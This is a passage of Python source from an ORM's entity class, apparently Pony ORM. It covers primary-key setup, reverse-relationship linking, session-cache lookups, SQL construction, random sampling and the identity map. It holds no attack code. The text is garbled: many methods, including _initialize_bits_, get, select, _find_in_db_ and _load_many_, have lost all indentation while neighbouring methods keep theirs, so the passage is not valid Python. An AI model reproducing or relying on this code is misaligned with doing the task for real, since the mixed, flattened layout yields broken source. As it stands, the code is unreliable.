        for i, attr in enumerate(pk_attrs): attr.pk_offset = i
        entity._pk_columns_ = None
        entity._pk_attrs_ = pk_attrs
        entity._pk_is_composite_ = len(pk_attrs) > 1
        entity._pk_ = pk_attrs if len(pk_attrs) > 1 else pk_attrs[0]
        # secondary (non-pk) unique keys, split into single-attr and composite
        entity._keys_ = [ index.attrs for index in indexes if index.is_unique and not index.is_pk ]
        entity._simple_keys_ = [ key[0] for key in entity._keys_ if len(key) == 1 ]
        entity._composite_keys_ = [ key for key in entity._keys_ if len(key) > 1 ]
        entity._new_attrs_ = new_attrs
        entity._attrs_ = base_attrs + new_attrs
        entity._adict_ = {attr.name: attr for attr in entity._attrs_}
        # --- propagate new non-collection attrs up to all bases (for subclass-aware queries) ---
        entity._subclass_attrs_ = []
        entity._subclass_adict_ = {}
        for base in entity._all_bases_:
            for attr in new_attrs:
                if attr.is_collection: continue
                prev = base._subclass_adict_.setdefault(attr.name, attr)
                if prev is not attr: throw(ERDiagramError,
                    'Attribute %s conflicts with attribute %s because both entities inherit from %s. '
                    'To fix this, move attribute definition to base class'
                    % (attr, prev, entity._root_.__name__))
                base._subclass_attrs_.append(attr)
        entity._attrnames_cache_ = {}
        # --- validate a user-supplied _table_ name (string, or list/tuple of strings for schema-qualified names) ---
        try: table_name = entity.__dict__['_table_']
        except KeyError: entity._table_ = None
        else:
            if not isinstance(table_name, basestring):
                if not isinstance(table_name, (list, tuple)): throw(TypeError,
                    '%s._table_ property must be a string. Got: %r' % (entity.__name__, table_name))
                for name_part in table_name:
                    if not isinstance(name_part, basestring):throw(TypeError,
                        'Each part of table name must be a string. Got: %r' % name_part)
                entity._table_ = table_name = tuple(table_name)
        # register the entity on the database object
        database.entities[entity.__name__] = entity
        setattr(database, entity.__name__, entity)
        # per-entity SQL statement caches
        entity._cached_max_id_sql_ = None
        entity._find_sql_cache_ = {}
        entity._load_sql_cache_ = {}
        entity._batchload_sql_cache_ = {}
        entity._insert_sql_cache_ = {}
        entity._update_sql_cache_ = {}
        entity._delete_sql_cache_ = {}
        entity._propagation_mixin_ = None
        entity._set_wrapper_subclass_ = None
        entity._multiset_subclass_ = None
        # --- discriminator setup for single-table inheritance ---
        if '_discriminator_' not in entity.__dict__:
            entity._discriminator_ = None
        if entity._discriminator_ is not None and not entity._discriminator_attr_:
            Discriminator.create_default_attr(entity)
        if entity._discriminator_attr_:
            entity._discriminator_attr_.process_entity_inheritance(entity)
        # default loop-variable name for generated queries: initials of the class name
        # (e.g. OrderItem -> 'oi'), falling back to the full class name
        iter_name = entity._default_iter_name_ = (
            ''.join(letter for letter in entity.__name__ if letter.isupper()).lower()
            or entity.__name__
        )
        # prebuilt AST for `(x for x in Entity)` used by _select_all
        for_expr = ast.GenExprFor(ast.AssName(iter_name, 'OP_ASSIGN'), ast.Name('.0'), [])
        inner_expr = ast.GenExprInner(ast.Name(iter_name), [ for_expr ])
        entity._default_genexpr_ = inner_expr
        entity._access_rules_ = defaultdict(set)
def _initialize_bits_(entity):
entity._bits_ = {}
entity._bits_except_volatile_ = {}
offset_counter = itertools.count()
all_bits = all_bits_except_volatile = 0
for attr in entity._attrs_:
if attr.is_collection or attr.is_discriminator or attr.pk_offset is not None: bit = 0
elif not attr.columns: bit = 0
else: bit = 1 << next(offset_counter)
all_bits |= bit
entity._bits_[attr] = bit
if attr.is_volatile: bit = 0
all_bits_except_volatile |= bit
entity._bits_except_volatile_[attr] = bit
entity._all_bits_ = all_bits
entity._all_bits_except_volatile_ = all_bits_except_volatile
    def _resolve_attr_types_(entity):
        # Resolve forward references in attribute types: attributes may be declared
        # with an entity name string (e.g. Set('Order')) or a zero-arg callable that
        # returns the entity class; both are replaced with the real entity class here.
        database = entity._database_
        for attr in entity._new_attrs_:
            py_type = attr.py_type
            if isinstance(py_type, basestring):
                # lookup by name in the database's entity registry
                rentity = database.entities.get(py_type)
                if rentity is None:
                    throw(ERDiagramError, 'Entity definition %s was not found' % py_type)
                attr.py_type = py_type = rentity
            elif isinstance(py_type, types.FunctionType):
                # lazy callable form: call it to obtain the entity class
                rentity = py_type()
                if not isinstance(rentity, EntityMeta): throw(TypeError,
                    'Invalid type of attribute %s: expected entity class, got %r' % (attr, rentity))
                attr.py_type = py_type = rentity
            # linking to the abstract Entity base is never allowed
            if isinstance(py_type, EntityMeta) and py_type.__name__ == 'Entity': throw(TypeError,
                'Cannot link attribute %s to abstract Entity class. Use specific Entity subclass instead' % attr)
    def _link_reverse_attrs_(entity):
        # Pair up each relationship attribute with its reverse attribute on the
        # related entity. The reverse may be given explicitly (as a name or an
        # Attribute object) or discovered automatically when unambiguous.
        database = entity._database_
        for attr in entity._new_attrs_:
            py_type = attr.py_type
            if not issubclass(py_type, Entity): continue
            entity2 = py_type
            if entity2._database_ is not database:
                throw(ERDiagramError, 'Interrelated entities must belong to same database. '
                                      'Entities %s and %s belongs to different databases'
                                      % (entity.__name__, entity2.__name__))
            reverse = attr.reverse
            if isinstance(reverse, basestring):
                # explicit reverse given by name
                attr2 = getattr(entity2, reverse, None)
                if attr2 is None: throw(ERDiagramError, 'Reverse attribute %s.%s not found' % (entity2.__name__, reverse))
            elif isinstance(reverse, Attribute):
                # explicit reverse given as the Attribute object itself
                attr2 = reverse
                if attr2.entity is not entity2: throw(ERDiagramError, 'Incorrect reverse attribute %s used in %s' % (attr2, attr)) ###
            elif reverse is not None: throw(ERDiagramError, "Value of 'reverse' option must be string. Got: %r" % type(reverse))
            else:
                # no explicit reverse: search entity2's new attrs for candidates.
                # candidates1 = attrs that explicitly point back at this attr;
                # candidates2 = attrs of matching type with no reverse declared.
                candidates1 = []
                candidates2 = []
                for attr2 in entity2._new_attrs_:
                    if attr2.py_type not in (entity, entity.__name__): continue
                    reverse2 = attr2.reverse
                    if reverse2 in (attr, attr.name): candidates1.append(attr2)
                    elif not reverse2:
                        if attr2 is attr: continue
                        candidates2.append(attr2)
                msg = "Ambiguous reverse attribute for %s. Use the 'reverse' parameter for pointing to right attribute"
                if len(candidates1) > 1: throw(ERDiagramError, msg % attr)
                elif len(candidates1) == 1: attr2 = candidates1[0]
                elif len(candidates2) > 1: throw(ERDiagramError, msg % attr)
                elif len(candidates2) == 1: attr2 = candidates2[0]
                else: throw(ERDiagramError, 'Reverse attribute for %s not found' % attr)
            # validate the chosen pair is mutually consistent
            type2 = attr2.py_type
            if type2 != entity:
                throw(ERDiagramError, 'Inconsistent reverse attributes %s and %s' % (attr, attr2))
            reverse2 = attr2.reverse
            if reverse2 not in (None, attr, attr.name):
                throw(ERDiagramError, 'Inconsistent reverse attributes %s and %s' % (attr, attr2))
            if attr.is_required and attr2.is_required: throw(ERDiagramError,
                "At least one attribute of one-to-one relationship %s - %s must be optional" % (attr, attr2))
            # link both sides and notify the attributes
            attr.reverse = attr2
            attr2.reverse = attr
            attr.linked()
            attr2.linked()
def _check_table_options_(entity):
if entity._root_ is not entity:
if '_table_options_' in entity.__dict__: throw(TypeError,
'Cannot redefine %s options in %s entity' % (entity._root_.__name__, entity.__name__))
elif not hasattr(entity, '_table_options_'):
entity._table_options_ = {}
def _get_pk_columns_(entity):
if entity._pk_columns_ is not None: return entity._pk_columns_
pk_columns = []
pk_converters = []
pk_paths = []
for attr in entity._pk_attrs_:
attr_columns = attr.get_columns()
attr_col_paths = attr.col_paths
attr.pk_columns_offset = len(pk_columns)
pk_columns.extend(attr_columns)
pk_converters.extend(attr.converters)
pk_paths.extend(attr_col_paths)
entity._pk_columns_ = pk_columns
entity._pk_converters_ = pk_converters
entity._pk_nones_ = (None,) * len(pk_columns)
entity._pk_paths_ = pk_paths
return pk_columns
def __iter__(entity):
return EntityIter(entity)
@cut_traceback
def __getitem__(entity, key):
if type(key) is not tuple: key = (key,)
if len(key) != len(entity._pk_attrs_):
throw(TypeError, 'Invalid count of attrs in %s primary key (%s instead of %s)'
% (entity.__name__, len(key), len(entity._pk_attrs_)))
kwargs = {attr.name: value for attr, value in izip(entity._pk_attrs_, key)}
return entity._find_one_(kwargs)
@cut_traceback
def exists(entity, *args, **kwargs):
if args: return entity._query_from_args_(args, kwargs, frame_depth=cut_traceback_depth+1).exists()
try: obj = entity._find_one_(kwargs)
except ObjectNotFound: return False
except MultipleObjectsFoundError: return True
return True
@cut_traceback
def get(entity, *args, **kwargs):
if args: return entity._query_from_args_(args, kwargs, frame_depth=cut_traceback_depth+1).get()
try: return entity._find_one_(kwargs) # can throw MultipleObjectsFoundError
except ObjectNotFound: return None
@cut_traceback
def get_for_update(entity, *args, **kwargs):
nowait = kwargs.pop('nowait', False)
if args: return entity._query_from_args_(args, kwargs, frame_depth=cut_traceback_depth+1).for_update(nowait).get()
try: return entity._find_one_(kwargs, True, nowait) # can throw MultipleObjectsFoundError
except ObjectNotFound: return None
@cut_traceback
def get_by_sql(entity, sql, globals=None, locals=None):
objects = entity._find_by_sql_(1, sql, globals, locals, frame_depth=cut_traceback_depth+1) # can throw MultipleObjectsFoundError
if not objects: return None
assert len(objects) == 1
return objects[0]
@cut_traceback
def select(entity, *args):
return entity._query_from_args_(args, kwargs=None, frame_depth=cut_traceback_depth+1)
@cut_traceback
def select_by_sql(entity, sql, globals=None, locals=None):
return entity._find_by_sql_(None, sql, globals, locals, frame_depth=cut_traceback_depth+1)
    @cut_traceback
    def select_random(entity, limit):
        # Fast random sampling for entities with a simple integer primary key:
        # instead of ORDER BY RANDOM() (which scans the table), pick random ids
        # in [1, max_id] and batch-load them, retrying until `limit` objects are
        # found. Falls back to Query.random() for composite pks, non-int pks,
        # subclass queries with a discriminator, or small/sparse tables.
        if entity._pk_is_composite_: return entity.select().random(limit)
        pk = entity._pk_attrs_[0]
        if not issubclass(pk.py_type, int) or entity._discriminator_ is not None and entity._root_ is not entity:
            return entity.select().random(limit)
        database = entity._database_
        cache = database._get_cache()
        # flush pending changes so the db view is consistent with the session
        if cache.modified: cache.flush()
        # obtain MAX(pk), caching both the SQL text and the value
        max_id = cache.max_id_cache.get(pk)
        if max_id is None:
            max_id_sql = entity._cached_max_id_sql_
            if max_id_sql is None:
                sql_ast = [ 'SELECT', [ 'AGGREGATES', [ 'MAX', None, [ 'COLUMN', None, pk.column ] ] ],
                                      [ 'FROM', [ None, 'TABLE', entity._table_ ] ] ]
                max_id_sql, adapter = database._ast2sql(sql_ast)
                entity._cached_max_id_sql_ = max_id_sql
            cursor = database._exec_sql(max_id_sql)
            max_id = cursor.fetchone()[0]
            cache.max_id_cache[pk] = max_id
        if max_id is None: return []  # empty table
        # table too small for random-id probing to be efficient
        if max_id <= limit * 2: return entity.select().random(limit)
        cache_index = cache.indexes[entity._pk_attrs_]
        result = []
        tried_ids = set()
        found_in_cache = False
        # up to 5 rounds: generate candidate ids, satisfy from the identity map
        # first, then batch-load the rest from the database
        for i in xrange(5):
            ids = []
            n = (limit - len(result)) * (i+1)  # over-sample more on each retry
            for j in xrange(n * 2):
                id = randint(1, max_id)
                if id in tried_ids: continue
                if id in ids: continue
                obj = cache_index.get(id)
                if obj is not None:
                    found_in_cache = True
                    tried_ids.add(id)
                    result.append(obj)
                    n -= 1
                else: ids.append(id)
                if len(ids) >= n: break
            if len(result) >= limit: break
            if not ids: continue
            sql, adapter, attr_offsets = entity._construct_batchload_sql_(len(ids), from_seeds=False)
            arguments = adapter([ (id,) for id in ids ])
            cursor = database._exec_sql(sql, arguments)
            objects = entity._fetch_objects(cursor, attr_offsets)
            result.extend(objects)
            tried_ids.update(ids)
            if len(result) >= limit: break
        # probing failed to find enough rows (sparse ids) — fall back to SQL-side random
        if len(result) < limit: return entity.select().random(limit)
        result = result[:limit]
        if entity._subclasses_:
            # seeds are partially-loaded objects; fully load any that ended up in the result
            seeds = cache.seeds[entity._pk_attrs_]
            if seeds:
                for obj in result:
                    if obj in seeds: obj._load_()
        # cache hits were appended first, so reshuffle to keep the sample unbiased
        if found_in_cache: shuffle(result)
        return result
    def _find_one_(entity, kwargs, for_update=False, nowait=False):
        # Find exactly one instance matching attribute=value criteria in `kwargs`.
        # Checks the session cache first, then queries the database.
        # Raises ObjectNotFound when nothing matches; callers rely on
        # MultipleObjectsFoundError propagating from the db lookup.
        if entity._database_.schema is None:
            throw(ERDiagramError, 'Mapping is not generated for entity %r' % entity.__name__)
        # translate attribute names to Attribute objects, validating values
        avdict = {}
        get_attr = entity._adict_.get
        for name, val in iteritems(kwargs):
            attr = get_attr(name)
            if attr is None: throw(TypeError, 'Unknown attribute %r' % name)
            avdict[attr] = attr.validate(val, None, entity, from_db=False)
        # derive the primary key value if it is fully specified in the criteria
        if entity._pk_is_composite_:
            pkval = tuple(imap(avdict.get, entity._pk_attrs_))
            if None in pkval: pkval = None
        else: pkval = avdict.get(entity._pk_attrs_[0])
        for attr in avdict:
            if attr.is_collection:
                throw(TypeError, 'Collection attribute %s cannot be specified as search criteria' % attr)
        obj, unique = entity._find_in_cache_(pkval, avdict, for_update)
        # cache miss (or cached object not locked while for_update): go to the db
        if obj is None: obj = entity._find_in_db_(avdict, unique, for_update, nowait)
        if obj is None: throw(ObjectNotFound, entity, pkval)
        return obj
    def _find_in_cache_(entity, pkval, avdict, for_update=False):
        # Try to satisfy a single-object lookup from the session cache.
        # Returns (obj, unique) where `unique` reports whether the criteria
        # included a unique key (so a db query may use LIMIT accordingly).
        # Returns (None, unique) on a miss, or when the cached object is not
        # locked but for_update was requested.
        cache = entity._database_._get_cache()
        cache_indexes = cache.indexes
        obj = None
        unique = False
        # 1) direct primary key lookup
        if pkval is not None:
            unique = True
            obj = cache_indexes[entity._pk_attrs_].get(pkval)
        # 2) single-attribute unique keys
        if obj is None:
            for attr in entity._simple_keys_:
                val = avdict.get(attr)
                if val is not None:
                    unique = True
                    obj = cache_indexes[attr].get(val)
                    if obj is not None: break
        # 3) composite unique keys (all parts must be present)
        if obj is None:
            for attrs in entity._composite_keys_:
                get_val = avdict.get
                vals = tuple(get_val(attr) for attr in attrs)
                if None in vals: continue
                unique = True
                cache_index = cache_indexes.get(attrs)
                if cache_index is None: continue
                obj = cache_index.get(vals)
                if obj is not None: break
        # 4) reverse side of a to-one relationship: the related object already
        #    knows its counterpart, so fetch it from there
        if obj is None:
            for attr, val in iteritems(avdict):
                if val is None: continue
                reverse = attr.reverse
                if reverse and not reverse.is_collection:
                    obj = reverse.__get__(val)
                    break
        if obj is not None:
            # verify the cached object really satisfies all criteria
            if obj._discriminator_ is not None:
                if obj._subclasses_:
                    cls = obj.__class__
                    if not issubclass(entity, cls) and not issubclass(cls, entity):
                        throw(ObjectNotFound, entity, pkval)
                    # seed objects are only partially loaded; load before class checks
                    seeds = cache.seeds[entity._pk_attrs_]
                    if obj in seeds: obj._load_()
                if not isinstance(obj, entity): throw(ObjectNotFound, entity, pkval)
            if obj._status_ == 'marked_to_delete': throw(ObjectNotFound, entity, pkval)
            for attr, val in iteritems(avdict):
                if val != attr.__get__(obj): throw(ObjectNotFound, entity, pkval)
            if for_update and obj not in cache.for_update:
                return None, unique  # object is found, but it is not locked
            # record which attributes were used, for optimistic-check bookkeeping
            entity._set_rbits((obj,), avdict)
            return obj, unique
        return None, unique
def _find_in_db_(entity, avdict, unique=False, for_update=False, nowait=False):
database = entity._database_
query_attrs = {attr: value is None for attr, value in iteritems(avdict)}
limit = 2 if not unique else None
sql, adapter, attr_offsets = entity._construct_sql_(query_attrs, False, limit, for_update, nowait)
arguments = adapter(avdict)
if for_update: database._get_cache().immediate = True
cursor = database._exec_sql(sql, arguments)
objects = entity._fetch_objects(cursor, attr_offsets, 1, for_update, avdict)
return objects[0] if objects else None
    def _find_by_sql_(entity, max_fetch_count, sql, globals, locals, frame_depth):
        # Execute a raw SQL query and materialize entity instances from the rows.
        # Result columns are matched to entity attributes by (case-insensitive)
        # column name; every result column must map to some attribute, and the
        # full primary key must be present.
        if not isinstance(sql, basestring): throw(TypeError)
        database = entity._database_
        cursor = database._exec_raw_sql(sql, globals, locals, frame_depth+1)
        col_names = [ column_info[0].upper() for column_info in cursor.description ]
        attr_offsets = {}
        used_columns = set()
        for attr in chain(entity._attrs_with_columns_, entity._subclass_attrs_):
            offsets = []
            for column in attr.columns:
                try: offset = col_names.index(column.upper())
                except ValueError: break  # this attr is not fully present in the result
                offsets.append(offset)
                used_columns.add(offset)
            else: attr_offsets[attr] = offsets  # for/else: all columns of attr were found
        # every selected column must belong to the entity
        if len(used_columns) < len(col_names):
            for i in xrange(len(col_names)):
                if i not in used_columns: throw(NameError,
                    'Column %s does not belong to entity %s' % (cursor.description[i][0], entity.__name__))
        # the primary key is mandatory to build identity-mapped objects
        for attr in entity._pk_attrs_:
            if attr not in attr_offsets: throw(ValueError,
                'Primary key attribue %s was not found in query result set' % attr)
        objects = entity._fetch_objects(cursor, attr_offsets, max_fetch_count)
        return objects
    def _construct_select_clause_(entity, alias=None, distinct=False,
                                  query_attrs=(), attrs_to_prefetch=(), all_attributes=False):
        # Build the SELECT-list portion of a SQL AST for this entity, returning
        # (select_list, attr_offsets) where attr_offsets maps each included
        # attribute to its column positions in the result row.
        attr_offsets = {}
        select_list = [ 'DISTINCT' ] if distinct else [ 'ALL' ]
        root = entity._root_
        for attr in chain(root._attrs_, root._subclass_attrs_):
            # unless all_attributes, keep only attrs relevant to this entity
            # (declared on it, a base, or a subclass)
            if not all_attributes and not issubclass(attr.entity, entity) \
                                  and not issubclass(entity, attr.entity): continue
            if attr.is_collection: continue
            if not attr.columns: continue
            # lazy attrs are skipped unless explicitly queried or prefetched
            if not attr.lazy or attr in query_attrs or attr in attrs_to_prefetch:
                attr_offsets[attr] = offsets = []
                for column in attr.columns:
                    # offset is relative to data columns (first element is ALL/DISTINCT)
                    offsets.append(len(select_list) - 1)
                    select_list.append([ 'COLUMN', alias, column ])
        return select_list, attr_offsets
def _construct_discriminator_criteria_(entity, alias=None):
discr_attr = entity._discriminator_attr_
if discr_attr is None: return None
code2cls = discr_attr.code2cls
discr_values = [ [ 'VALUE', cls._discriminator_ ] for cls in entity._subclasses_ ]
discr_values.append([ 'VALUE', entity._discriminator_])
return [ 'IN', [ 'COLUMN', alias, discr_attr.column ], discr_values ]
    def _construct_batchload_sql_(entity, batch_size, attr=None, from_seeds=True):
        # Build (and cache) the SQL used to load a batch of objects at once,
        # keyed either by primary key (attr is None) or by a specific attribute's
        # columns. Returns (sql, adapter, attr_offsets).
        query_key = batch_size, attr, from_seeds
        cached_sql = entity._batchload_sql_cache_.get(query_key)
        if cached_sql is not None: return cached_sql
        # all attributes are selected so the loaded objects are complete
        select_list, attr_offsets = entity._construct_select_clause_(all_attributes=True)
        from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ]]
        if attr is None:
            columns = entity._pk_columns_
            converters = entity._pk_converters_
        else:
            columns = attr.columns
            converters = attr.converters
        # some backends support row-value syntax: (a, b) IN ((?, ?), ...)
        row_value_syntax = entity._database_.provider.translator_cls.row_value_syntax
        criteria_list = construct_batchload_criteria_list(
            None, columns, converters, batch_size, row_value_syntax, from_seeds=from_seeds)
        sql_ast = [ 'SELECT', select_list, from_list, [ 'WHERE' ] + criteria_list ]
        database = entity._database_
        sql, adapter = database._ast2sql(sql_ast)
        cached_sql = sql, adapter, attr_offsets
        entity._batchload_sql_cache_[query_key] = cached_sql
        return cached_sql
    def _construct_sql_(entity, query_attrs, order_by_pk=False, limit=None, for_update=False, nowait=False):
        # Build (and cache) the SELECT statement used by _find_in_db_.
        # `query_attrs` maps each criteria attribute to a bool: True means the
        # criterion is "IS NULL", False means comparison against a parameter.
        # Returns (sql, adapter, attr_offsets).
        if nowait: assert for_update
        # cache key must be deterministic, so criteria are sorted
        sorted_query_attrs = tuple(sorted(query_attrs.items()))
        query_key = sorted_query_attrs, order_by_pk, limit, for_update, nowait
        cached_sql = entity._find_sql_cache_.get(query_key)
        if cached_sql is not None: return cached_sql
        select_list, attr_offsets = entity._construct_select_clause_(query_attrs=query_attrs)
        from_list = [ 'FROM', [ None, 'TABLE', entity._table_ ]]
        where_list = [ 'WHERE' ]
        # restrict by discriminator unless the discriminator itself is a criterion
        discr_attr = entity._discriminator_attr_
        if discr_attr and query_attrs.get(discr_attr) != False:
            discr_criteria = entity._construct_discriminator_criteria_()
            if discr_criteria: where_list.append(discr_criteria)
        for attr, attr_is_none in sorted_query_attrs:
            if not attr.reverse:
                # plain attribute: single-column IS NULL or parameterized equality
                if attr_is_none: where_list.append([ 'IS_NULL', [ 'COLUMN', None, attr.column ] ])
                else:
                    if len(attr.converters) > 1: throw(NotImplementedError)
                    converter = attr.converters[0]
                    where_list.append([ converter.EQ, [ 'COLUMN', None, attr.column ], [ 'PARAM', (attr, None, None), converter ] ])
            elif not attr.columns: throw(NotImplementedError)
            else:
                # relationship attribute: compare each foreign key column against
                # the corresponding component of the related object's primary key
                attr_entity = attr.py_type; assert attr_entity == attr.reverse.entity
                if attr_is_none:
                    for column in attr.columns:
                        where_list.append([ 'IS_NULL', [ 'COLUMN', None, column ] ])
                else:
                    for j, (column, converter) in enumerate(izip(attr.columns, attr_entity._pk_converters_)):
                        where_list.append([ converter.EQ, [ 'COLUMN', None, column ], [ 'PARAM', (attr, None, j), converter ] ])
        if not for_update: sql_ast = [ 'SELECT', select_list, from_list, where_list ]
        else: sql_ast = [ 'SELECT_FOR_UPDATE', bool(nowait), select_list, from_list, where_list ]
        if order_by_pk: sql_ast.append([ 'ORDER_BY' ] + [ [ 'COLUMN', None, column ] for column in entity._pk_columns_ ])
        if limit is not None: sql_ast.append([ 'LIMIT', limit ])
        database = entity._database_
        sql, adapter = database._ast2sql(sql_ast)
        cached_sql = sql, adapter, attr_offsets
        entity._find_sql_cache_[query_key] = cached_sql
        return cached_sql
    def _fetch_objects(entity, cursor, attr_offsets, max_fetch_count=None, for_update=False, used_attrs=()):
        # Turn cursor rows into identity-mapped entity instances.
        # With attr_offsets, each row is parsed into attribute values; without,
        # rows are assumed to be raw primary key values and objects are loaded
        # separately. Enforces MAX_FETCH_COUNT, raising when exceeded; a
        # max_fetch_count of 1 signals a "must be unique" lookup.
        if max_fetch_count is None: max_fetch_count = options.MAX_FETCH_COUNT
        if max_fetch_count is not None:
            # fetch one extra row to detect overflow
            rows = cursor.fetchmany(max_fetch_count + 1)
            if len(rows) == max_fetch_count + 1:
                if max_fetch_count == 1: throw(MultipleObjectsFoundError,
                    'Multiple objects were found. Use %s.select(...) to retrieve them' % entity.__name__)
                throw(TooManyObjectsFoundError,
                      'Found more then pony.options.MAX_FETCH_COUNT=%d objects' % options.MAX_FETCH_COUNT)
        else: rows = cursor.fetchall()
        objects = []
        if attr_offsets is None:
            # rows contain only pk values; objects become seeds and are bulk-loaded
            objects = [ entity._get_by_raw_pkval_(row, for_update) for row in rows ]
            entity._load_many_(objects)
        else:
            for row in rows:
                real_entity_subclass, pkval, avdict = entity._parse_row_(row, attr_offsets)
                obj = real_entity_subclass._get_from_identity_map_(pkval, 'loaded', for_update)
                # skip objects already deleted in this session
                if obj._status_ in del_statuses: continue
                obj._db_set_(avdict)
                objects.append(obj)
        # mark which attributes were read, for optimistic concurrency checks
        if used_attrs: entity._set_rbits(objects, used_attrs)
        return objects
def _set_rbits(entity, objects, attrs):
rbits_dict = {}
get_rbits = rbits_dict.get
for obj in objects:
wbits = obj._wbits_
if wbits is None: continue
rbits = get_rbits(obj.__class__)
if rbits is None:
rbits = sum(obj._bits_except_volatile_.get(attr, 0) for attr in attrs)
rbits_dict[obj.__class__] = rbits
obj._rbits_ |= rbits & ~wbits
    def _parse_row_(entity, row, attr_offsets):
        # Parse one result row into (real_entity_subclass, pkval, avdict).
        # The discriminator column (if any) selects the concrete subclass to
        # instantiate; remaining columns become attribute values.
        discr_attr = entity._discriminator_attr_
        if not discr_attr:
            discr_value = None
            real_entity_subclass = entity
        else:
            discr_offset = attr_offsets[discr_attr][0]
            discr_value = discr_attr.validate(row[discr_offset], None, entity, from_db=True)
            real_entity_subclass = discr_attr.code2cls[discr_value]
            discr_value = real_entity_subclass._discriminator_ # To convert unicode to str in Python 2.x
        avdict = {}
        for attr in real_entity_subclass._attrs_:
            offsets = attr_offsets.get(attr)
            if offsets is None or attr.is_discriminator: continue
            avdict[attr] = attr.parse_value(row, offsets)
        # pk values are removed from avdict; the discr_value default covers the
        # case where a pk attribute is the discriminator itself (not in avdict)
        pkval = tuple(avdict.pop(attr, discr_value) for attr in entity._pk_attrs_)
        assert None not in pkval
        if not entity._pk_is_composite_: pkval = pkval[0]
        return real_entity_subclass, pkval, avdict
def _load_many_(entity, objects):
database = entity._database_
cache = database._get_cache()
seeds = cache.seeds[entity._pk_attrs_]
if not seeds: return
objects = {obj for obj in objects if obj in seeds}
objects = sorted(objects, key=attrgetter('_pkval_'))
max_batch_size = database.provider.max_params_count // len(entity._pk_columns_)
while objects:
batch = objects[:max_batch_size]
objects = objects[max_batch_size:]
sql, adapter, attr_offsets = entity._construct_batchload_sql_(len(batch))
arguments = adapter(batch)
cursor = database._exec_sql(sql, arguments)
result = entity._fetch_objects(cursor, attr_offsets)
if len(result) < len(batch):
for obj in result:
if obj not in batch: throw(UnrepeatableReadError,
'Phantom object %s disappeared' % safe_repr(obj))
def _select_all(entity):
return Query(entity._default_iter_name_, entity._default_genexpr_, {}, { '.0' : entity })
    def _query_from_args_(entity, args, kwargs, frame_depth):
        # Build a Query from select()/get()-style arguments: either a lambda
        # (decompiled to an AST) or a lambda source string (parsed directly).
        # With no args at all, return a query over all instances.
        if not args and not kwargs: return entity._select_all()
        func, globals, locals = get_globals_and_locals(args, kwargs, frame_depth+1)
        if type(func) is types.FunctionType:
            # real lambda: recover its AST from bytecode
            names = get_lambda_args(func)
            code_key = id(func.func_code if PY2 else func.__code__)
            cond_expr, external_names, cells = decompile(func)
        elif isinstance(func, basestring):
            # lambda given as source text
            code_key = func
            lambda_ast = string2ast(func)
            if not isinstance(lambda_ast, ast.Lambda):
                throw(TypeError, 'Lambda function is expected. Got: %s' % func)
            names = get_lambda_args(lambda_ast)
            cond_expr = lambda_ast.code
            cells = None
        else: assert False  # pragma: no cover
        if len(names) != 1: throw(TypeError,
            'Lambda query requires exactly one parameter name, like %s.select(lambda %s: ...). '
            'Got: %d parameters' % (entity.__name__, entity.__name__[0].lower(), len(names)))
        # wrap the lambda body as the condition of a generator expression:
        # (name for name in entity if <cond_expr>)
        name = names[0]
        if_expr = ast.GenExprIf(cond_expr)
        for_expr = ast.GenExprFor(ast.AssName(name, 'OP_ASSIGN'), ast.Name('.0'), [ if_expr ])
        inner_expr = ast.GenExprInner(ast.Name(name), [ for_expr ])
        # '.0' is the conventional name of the generator's implicit iterable
        locals = locals.copy() if locals is not None else {}
        assert '.0' not in locals
        locals['.0'] = entity
        return Query(code_key, inner_expr, globals, locals, cells)
    def _get_from_identity_map_(entity, pkval, status, for_update=False, undo_funcs=None, obj_to_init=None):
        # Core of the identity map: return the session's unique instance for a
        # primary key value, creating (or initializing `obj_to_init`) when absent.
        # `status` is 'loaded' (came from db; becomes a seed) or 'created'
        # (new in this session). A pkval of None means the key is not known yet
        # (e.g. auto-incremented id before INSERT).
        cache = entity._database_._get_cache()
        pk_attrs = entity._pk_attrs_
        cache_index = cache.indexes[pk_attrs]
        if pkval is None: obj = None
        else: obj = cache_index.get(pkval)
        if obj is None: pass
        elif status == 'created':
            # creating an object whose pk already exists in the session is an error
            if entity._pk_is_composite_: pkval = ', '.join(str(item) for item in pkval)
            throw(CacheIndexError, 'Cannot create %s: instance with primary key %s already exists'
                                   % (obj.__class__.__name__, pkval))
        # existing object found: reconcile its class with the requested entity
        elif obj.__class__ is entity: pass
        elif issubclass(obj.__class__, entity): pass
        elif not issubclass(entity, obj.__class__): throw(TransactionError,
            'Unexpected class change from %s to %s for object with primary key %r' %
            (obj.__class__, entity, obj._pkval_))
        elif obj._rbits_ or obj._wbits_: throw(NotImplementedError)
        else: obj.__class__ = entity  # narrow a base-class seed to the real subclass
        if obj is None:
            # no cached instance: create/initialize one without triggering a flush
            with cache.flush_disabled():
                obj = obj_to_init
                if obj_to_init is None:
                    obj = object.__new__(entity)
                    cache.objects.add(obj)
                obj._pkval_ = pkval
                obj._status_ = status
                obj._vals_ = {}
                obj._dbvals_ = {}
                obj._save_pos_ = None
                obj._session_cache_ = cache
                if pkval is not None:
                    cache_index[pkval] = obj
                    obj._newid_ = None
                else: obj._newid_ = next(new_instance_id_counter)
                if obj._pk_is_composite_: pairs = izip(pk_attrs, pkval)
                else: pairs = ((pk_attrs[0], pkval),)
                if status == 'loaded':
                    # db-loaded object starts as a seed (only pk known)
                    assert undo_funcs is None
                    obj._rbits_ = obj._wbits_ = 0
                    for attr, val in pairs:
                        obj._vals_[attr] = val
                        if attr.reverse: attr.db_update_reverse(obj, NOT_LOADED, val)
                    cache.seeds[pk_attrs].add(obj)
                elif status == 'created':
                    # user-created object: reverse updates are undoable
                    assert undo_funcs is not None
                    obj._rbits_ = obj._wbits_ = None
                    for attr, val in pairs:
                        obj._vals_[attr] = val
                        if attr.reverse: attr.update_reverse(obj, NOT_LOADED, val, undo_funcs)
                    cache.for_update.add(obj)
                else: assert False  # pragma: no cover
        if for_update:
            assert cache.in_transaction
            cache.for_update.add(obj)
        return obj
    def _get_by_raw_pkval_(entity, raw_pkval, for_update=False, from_db=True):
        # Build/return the identity-mapped object for a raw db-level primary key
        # tuple. Relationship pk components are recursively resolved to related
        # objects (which may themselves become seeds).
        i = 0
        pkval = []
        for attr in entity._pk_attrs_:
            if attr.column is not None:
                # single-column attribute
                val = raw_pkval[i]
                i += 1
                if not attr.reverse: val = attr.validate(val, None, entity, from_db=from_db)
                else: val = attr.py_type._get_by_raw_pkval_((val,), from_db=from_db)
            else:
                # multi-column attribute: must be a relationship with composite fk
                if not attr.reverse: throw(NotImplementedError)
                vals = raw_pkval[i:i+len(attr.columns)]
